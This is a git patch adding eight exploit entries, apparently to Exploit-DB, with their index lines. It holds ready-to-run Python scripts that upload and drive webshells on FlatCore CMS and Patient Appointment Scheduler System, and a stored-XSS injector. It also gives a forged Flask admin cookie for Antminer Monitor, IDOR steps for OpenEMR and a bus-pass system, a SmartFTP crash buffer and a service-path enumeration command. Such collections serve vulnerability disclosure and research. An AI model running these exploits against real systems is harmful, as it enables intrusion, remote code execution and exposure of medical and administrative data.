From 8f90c99e8cb3edddfce46acc38bcd9652691ae9b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 7 Sep 2021 05:02:00 +0000 Subject: [PATCH] DB: 2021-09-07 8 changes to exploits/shellcodes SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service Argus Surveillance DVR 4.0 - Unquoted Service Path OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR) FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated) Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR) Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE) Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS Antminer Monitor 0.5.0 - Authentication Bypass --- exploits/multiple/webapps/50267.txt | 48 +++++++++++++++++ exploits/php/webapps/50260.txt | 18 +++++++ exploits/php/webapps/50262.py | 80 +++++++++++++++++++++++++++++ exploits/php/webapps/50263.txt | 25 +++++++++ exploits/php/webapps/50264.py | 78 ++++++++++++++++++++++++++++ exploits/php/webapps/50265.py | 75 +++++++++++++++++++++++++++ exploits/windows/dos/50266.py | 38 ++++++++++++++ exploits/windows/local/50261.txt | 26 ++++++++++ files_exploits.csv | 8 +++ 9 files changed, 396 insertions(+) create mode 100644 exploits/multiple/webapps/50267.txt create mode 100644 exploits/php/webapps/50260.txt create mode 100755 exploits/php/webapps/50262.py create mode 100644 exploits/php/webapps/50263.txt create mode 100755 exploits/php/webapps/50264.py create mode 100755 exploits/php/webapps/50265.py create mode 100755 exploits/windows/dos/50266.py create mode 100644 exploits/windows/local/50261.txt diff --git a/exploits/multiple/webapps/50267.txt b/exploits/multiple/webapps/50267.txt new file mode 100644 index 000000000..fef214ff0 --- /dev/null +++ b/exploits/multiple/webapps/50267.txt @@ -0,0 +1,48 @@ +# Exploit Title: Antminer Monitor 0.5.0 - Authentication Bypass +# Date: 09/06/2021 +# Dork:https://www.zoomeye.org/searchResult?q=%22antminer%20monitor%22 +# Exploit Author: CQR.company / Vulnz. +# Vendor Homepage: https://github.com/anselal/antminer-monitor, https://twitter.com/intent/follow?screen_name=AntminerMonitor +# Software Link: https://github.com/anselal/antminer-monitor, https://soulis.tech/ +# Version: 0.5.0 +# Tested on: Windows, Linux, Macos + + +Software is commonly used for Monitoring antminers and could easily be +found in zoomeye ( 800), shodan ( 500). + +For now this is the most popular antminer monitoring tool. + +Vulnerability in Antminer Monitor exists because of backdoor or +misconfiguration done + +by developer inside settings file in flask server. + +Settings file has a predefined secret string, which would be randomly +generated, however it is static in this +build.antminer-monitor/settings.py at +5c62e1064af30674bacb9e1917d5980efbde1fcd · anselal/antminer-monitor · +GitHub + +Secret key is 'super secret key'. + +Based on this information we can craft authorization bypass cookies. + +Using software flask-unsing we can generate cookie which will provide +you admin access. + +flask-unsign --sign --cookie "{'_fresh': True, '_id': +b'df230a95eb5318d31fa83690c667cfd6a824dbfe61949bf30b9d75e71c6ea20714b87113fcafe2340df9a8a6f3567e7a2faedc2c12d05e4e338558e47afe84f6', +'_user_id': '1', 'csrf_token': +b'15d0261b7f3f40849920ebb94f7a2368397f76ff'}" --secret "super secret +key" + +Additionally you can use this universal cookie to access web interface +of flask application. + +This cookie can work on all systems in "session" field. + +.eJw9j81Og0AURl_FzLoLfmTTpAubaQkm9xLMpeTeTaNAGQdGE9BQp-m7O3HhA3zfOeemzpe5X4zaXl6npd-o83untjf18Ka2SnL-Ab83JZ0mtrUHMiP4o2MaPNpxZc8JJuhEiyl1EUn-7IT4WlKVsWMPeZGJbmOh9speJqZiRX-I2A4p0MGLQyOuDoxqDayMyRgMOyROhToDTow0LxYcXMFVKzZ1JAS-1HVc5nWEyTHwhkgs79Q9uH8v_fwXoGK1Ue0yX85fn2P_8V8EdBpBFwk0RSoWHeqnR9RjBnY_sSsyzDkNlqFu8CV1DoOjDLvwfv8FnZ1jTQ.YS2Hvw.a-bvt7Y4e2kKNs0iXkRxHnRRJAU + + +In addition DEBUG = True which means /console works, however it needs pin. \ No newline at end of file diff --git a/exploits/php/webapps/50260.txt b/exploits/php/webapps/50260.txt new file mode 100644 index 000000000..782d1e2f5 --- /dev/null +++ b/exploits/php/webapps/50260.txt @@ -0,0 +1,18 @@ +# Exploit Title: OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR) +# Date: 31/08/2021 +# Exploit Author: Allen Enosh Upputori +# Vendor Homepage: https://www.open-emr.org +# Software Link: https://www.open-emr.org/wiki/index.php/OpenEMR_Downloads +# Version: 6.0.0 +# Tested on: Linux +# CVE : CVE-2021-40352 + +How to Reproduce this Vulnerability: + +1. Install Openemr 6.0.0 +2. Login as an Physician +3. Open Messages +4. Click Print +5. Change the existing "noteid=" value to another number + +This will reveal everybodys messages Incuding Admin only Messages \ No newline at end of file diff --git a/exploits/php/webapps/50262.py b/exploits/php/webapps/50262.py new file mode 100755 index 000000000..2fa3042b9 --- /dev/null +++ b/exploits/php/webapps/50262.py @@ -0,0 +1,80 @@ +# Exploit Title: FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated) +# Date: 04/10/2021 +# Exploit Author: Mason Soroka-Gill @sgizoid +# Vendor Homepage: https://flatcore.org/ +# Software Link: https://github.com/flatCore/flatCore-CMS/archive/refs/tags/v2.0.7.tar.gz +# Version: 2.0.7 +# Tested on: Ubuntu Server 21.04 +# CVE: CVE-2021-39608 +# References: +# - https://github.com/flatCore/flatCore-CMS/issues/52 + +#!/usr/bin/env python3 + +import sys +import requests +from lxml import html +from urllib.parse import urlencode + +if len(sys.argv) != 4: + print(f"Usage: {sys.argv[0]} 'http(s)://TARGET' 'USERNAME' 'PASSWORD'") + exit(1) + +TARGET = sys.argv[1] +USERNAME = sys.argv[2] +PASSWORD = sys.argv[3] + +# attempt to log in +resp = requests.post(f"{TARGET}/index.php?p=1", + data={ + "login_name":f"{USERNAME}", + "login_psw":f"{PASSWORD}", + "login":"Anmelden"}) + +# grab the PHP session ID +PHPSESSID = resp.headers['Set-Cookie'].split(";")[0] + +# validate credentials worked +resp = requests.get(f"{TARGET}/acp/acp.php?tn=addons", + headers={"Cookie":PHPSESSID}) +if resp.status_code != 200: + print("Invalid credentials") + exit(1) +else: + print("Logged in") + +# grab the csrf token for the script upload +csrf_token = html.document_fromstring(resp.text).xpath('//form/input[7]')[0].value + +# post the shell to the host +resp = requests.post(f"{TARGET}/acp/core/files.upload-script.php", + data={"upload_type":"plugin", "csrf_token":csrf_token}, # the csrf token + files={"file":("sgizoid.php", "")}, # the webshell + headers={"Cookie":PHPSESSID}) # the php session id + +# pretend to be a shell +while True: + command = input("$ ") + if command.lower() == "exit" or command.lower() == "q": + break + resp = requests.get(f"{TARGET}/upload/plugins/sgizoid.php?{urlencode({'sg':command})}") + # verify payload succeeded + if resp.status_code == 200: + print(resp.text) + else: + print("Error: Something went wrong, maybe the shell didn't work?") + break + +# delete the webshell +resp = requests.get(f"{TARGET}/acp/acp.php?tn=moduls&sub=u&dir=plugins&del=sgizoid.php", + headers={"Cookie":PHPSESSID}) +if resp.status_code == 200: + print("Cleaned up webshell") + +# clean up the session +resp = requests.get(f"{TARGET}/index.php?goto=logout", + headers={"Cookie":PHPSESSID}) +if resp.status_code == 200: + print("Logged out") + +exit(0) \ No newline at end of file diff --git a/exploits/php/webapps/50263.txt b/exploits/php/webapps/50263.txt new file mode 100644 index 000000000..7ee58b271 --- /dev/null +++ b/exploits/php/webapps/50263.txt @@ -0,0 +1,25 @@ +# Exploit Title: Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR) +# Date: 2021-09-05 +# Exploit Author: sudoninja +# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql +# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip +# Version: 1.0 +# Tested on: Windows 10 - XAMPP Server + +# Vulnerable page : + +http://localhost/buspassms/admin/view-pass-detail.php?viewid=4 + +# Vulnerable paramater : + +The viewid paramater is Vulnerable to Insecure direct object references (IDOR) + +# Proof Of Concept : + +# 1 . Download And install [ bus-pass-management-system ] +# 2 . Go to /admin/index.php and Enter Username & Password +# 3 . Navigate to search >> search pass +# 4 . Click on the view and enter the change viewid into the Url + +Use : +http://localhost/buspassms/admin/view-pass-detail.php?viewid=[change id] \ No newline at end of file diff --git a/exploits/php/webapps/50264.py b/exploits/php/webapps/50264.py new file mode 100755 index 000000000..73553d1da --- /dev/null +++ b/exploits/php/webapps/50264.py @@ -0,0 +1,78 @@ +# Exploit Title: Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE) +# Date: 03/09/2021 +# Exploit Author: a-rey +# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14928 +# Version: v1.0 +# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0 +# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import os +import time +import logging +import requests +import argparse + +BANNER = """ +╔═════════════════════════════════════════════════════════════════════════════════════════════════╗ +║ Patient Appointment Scheduler System v1.0 - Unauthenticated File Upload & Remote Code Execution ║ +╚═════════════════════════════════════════════════════════════════════════════════════════════════╝ + by: \033[0m\033[1;31m █████╗ ██████╗ ███████╗██╗ ██╗\033[0m + \033[0m\033[1;32m██╔══██╗ ██╔══██╗██╔════╝██║ ██║\033[0m + \033[0m\033[1;33m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝\033[0m + \033[0m\033[1;34m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[0m + \033[0m\033[1;35m██║ ██║ ██║ ██║███████╗ ██║ \033[0m + \033[0m\033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m +""" + + +def exploit(url:str, file:str, delay:int) -> None: + if not os.path.exists(file): + logging.error(f'webshell payload "{file}"" does not exist?') + return + logging.info(f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...') + uploadTime = int(time.time()) + r = requests.post(url + '/classes/SystemSettings.php', + files={'img' : (os.path.basename(file), open(file, 'rb'))}, # NOTE: can also use 'cover' field, but this is more inconspicuous + params={'f' : 'update_settings'}, + verify=False + ) + if not r.ok: + logging.error('HTTP upload request failed') + return + logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...') + for i in range(uploadTime - delay, uploadTime + delay + 1): + r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}', allow_redirects=False) + logging.debug(f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...') + # NOTE: website will send redirects for all files that do not exist + if r.status_code != 302: + logging.success(f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}') + return + logging.error('failed to find payload on target') + logging.warning('maybe need a larger delay or uploads directory is not writable?') + return + + +if __name__ == '__main__': + # parse arguments + parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) + parser.add_argument('-u', '--url', help='website URL', type=str, required=True) + parser.add_argument('-p', '--payload', help='PHP webshell file to upload', type=str, required=True) + parser.add_argument('-d', '--delay', help='delay (seconds) for file timestamp in payload name on target', type=int, required=False, default=60) + parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False) + args = parser.parse_args() + # define logger + logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG') + logging.SUCCESS = logging.CRITICAL + 1 + logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') + logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') + logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') + logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') + logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) + # print banner + print(BANNER) + # run exploit + exploit(args.url, args.payload, args.delay) \ No newline at end of file diff --git a/exploits/php/webapps/50265.py b/exploits/php/webapps/50265.py new file mode 100755 index 000000000..de3603f08 --- /dev/null +++ b/exploits/php/webapps/50265.py @@ -0,0 +1,75 @@ +# Exploit Title: Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS +# Date: 03/09/2021 +# Exploit Author: a-rey +# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14928 +# Version: v1.0 +# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0 +# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import os +import logging +import requests +import argparse + +BANNER = """ +╔═══════════════════════════════════════════════════════════════════╗ +║ Patient Appointment Scheduler System v1.0 - Persistent/Stored XSS ║ +╚═══════════════════════════════════════════════════════════════════╝ + by: \033[0m\033[1;31m █████╗ ██████╗ ███████╗██╗ ██╗\033[0m + \033[0m\033[1;32m██╔══██╗ ██╔══██╗██╔════╝██║ ██║\033[0m + \033[0m\033[1;33m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝\033[0m + \033[0m\033[1;34m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[0m + \033[0m\033[1;35m██║ ██║ ██║ ██║███████╗ ██║ \033[0m + \033[0m\033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m +""" + + +def exploit(url:str, file:str) -> None: + if not os.path.exists(file): + logging.error(f'{file} does not exist?') + return + logging.info(f'reading {file} for XSS content ...') + with open(file, 'r') as f: + xssPayload = f.read() + logging.info(f'sending XSS payload ({len(xssPayload)} bytes) to {url}/classes/SystemSettings.php ...') + r = requests.post(url + '/classes/SystemSettings.php', + data={'about_us' : xssPayload}, + params={'f' : 'update_settings'}, + verify=False + ) + if not r.ok: + logging.error('HTTP request failed') + return + logging.info('checking for XSS payload on main page ...') + r = requests.get(url) + if xssPayload not in r.text: + logging.error(f'XSS injection failed? received: {r.text}') + logging.warning('maybe about.html is not writable?') + return + logging.success('XSS payload found on target website') + return + + +if __name__ == '__main__': + # parse arguments + parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) + parser.add_argument('-u', '--url', help='website URL', type=str, required=True) + parser.add_argument('-f', '--file', help='file with DOM content to inject', type=str, required=True) + parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False) + args = parser.parse_args() + # define logger + logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG') + logging.SUCCESS = logging.CRITICAL + 1 + logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') + logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') + logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') + logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') + logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) + # print banner + print(BANNER) + # run exploit + exploit(args.url, args.file) \ No newline at end of file diff --git a/exploits/windows/dos/50266.py b/exploits/windows/dos/50266.py new file mode 100755 index 000000000..8327b66c3 --- /dev/null +++ b/exploits/windows/dos/50266.py @@ -0,0 +1,38 @@ +# Exploit Title: SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service +# Date: 9/5/2021 +# Exploit Author: Eric Salario +# Vendor Homepage: https://www.smartftp.com/en-us/ +# Software Link: https://www.smartftp.com/en-us/download +# Version: 10.0.2909.0 (32 and 64 bit) +# Tested on: Microsoft Windows 10 32 bit and 64 bit + +========================================================================= + +buffer = "//" +buffer += "A" * 423 + +f = open ("path.txt", "w") +f.write(buffer) +f.close() + +1. Run the python script +2. Open SmartFTP > New Connection > FTPS (explicit) +3. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255) +4. In Path, copy paste the content of the "path.txt" generated by the python script +5. Click "OK" +6. SmartFTP client crashes + +======================================================================= +1. Open SmartFTP > New Connection > FTPS (explicit) +2. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255) +3. In Path, type slash ("/") and click "OK" +4. The app should return "Error 0x80072741" +5. In the path's search bar, replace slash ("/") with whatever and press enter +6. SmartFTP client crashes + +======================================================================= + +1. Open SmartFTP +2. In the "New Connection" bar, clear the history (dropdown to the right of the bar) +3. Once the history is empty, click the bar and type anything +3. SmartFTP client crashes \ No newline at end of file diff --git a/exploits/windows/local/50261.txt b/exploits/windows/local/50261.txt new file mode 100644 index 000000000..d9aaca217 --- /dev/null +++ b/exploits/windows/local/50261.txt @@ -0,0 +1,26 @@ +# Exploit Title: Argus Surveillance DVR 4.0 - Unquoted Service Path +# Exploit Author: Salman Asad (@deathflash1411, salman@defmax.io) +# Date: 03.09.2021 +# Version: Argus Surveillance DVR 4.0 +# Tested on: Windows 10 + +# Note: "Start as service on Windows Startup" must be enabled in Program Options + +# Proof of Concept: + +C:\Users\death>sc qc ARGUSSURVEILLANCEDVR_WATCHDOG +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ARGUSSURVEILLANCEDVR_WATCHDOG + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Argus Surveillance DVR Watchdog + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ +Argus Surveillance DVR Watchdog ARGUSSURVEILLANCEDVR_WATCHDOG C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe Auto \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 79d5d666a..d326abffd 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6798,6 +6798,7 @@ id,file,description,date,author,type,platform,port 50003,exploits/ios/dos/50003.py,"Notex the best notes 6.4 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, 50153,exploits/windows/dos/50153.py,"Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)",1970-01-01,stresser,dos,windows, 50247,exploits/windows/dos/50247.py,"Telegram Desktop 2.9.2 - Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",dos,windows, +50266,exploits/windows/dos/50266.py,"SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service",1970-01-01,"Eric Salario",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux, @@ -11383,6 +11384,7 @@ id,file,description,date,author,type,platform,port 50212,exploits/windows/local/50212.txt,"SonicWall NetExtender 10.2.0.300 - Unquoted Service Path",1970-01-01,shinnai,local,windows, 50236,exploits/linux/local/50236.py,"MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)",1970-01-01,ninpwn,local,linux, 50258,exploits/windows/local/50258.txt,"Remote Mouse 4.002 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, +50261,exploits/windows/local/50261.txt,"Argus Surveillance DVR 4.0 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -44382,3 +44384,9 @@ id,file,description,date,author,type,platform,port 50254,exploits/hardware/webapps/50254.txt,"Compro Technology IP Camera - ' mjpegStreamer.cgi' Screenshot Disclosure",1970-01-01,icekam,webapps,hardware, 50255,exploits/multiple/webapps/50255.txt,"WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Sentinal920,webapps,multiple, 50259,exploits/php/webapps/50259.txt,"OpenSIS 8.0 'modname' - Directory/Path Traversal",1970-01-01,"Eric Salario",webapps,php, +50260,exploits/php/webapps/50260.txt,"OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)",1970-01-01,"Allen Enosh Upputori",webapps,php, +50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Mason Soroka-Gill",webapps,php, +50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",1970-01-01,sudoninja,webapps,php, +50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE)",1970-01-01,a-rey,webapps,php, +50265,exploits/php/webapps/50265.py,"Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS",1970-01-01,a-rey,webapps,php, +50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",1970-01-01,Vulnz,webapps,multiple,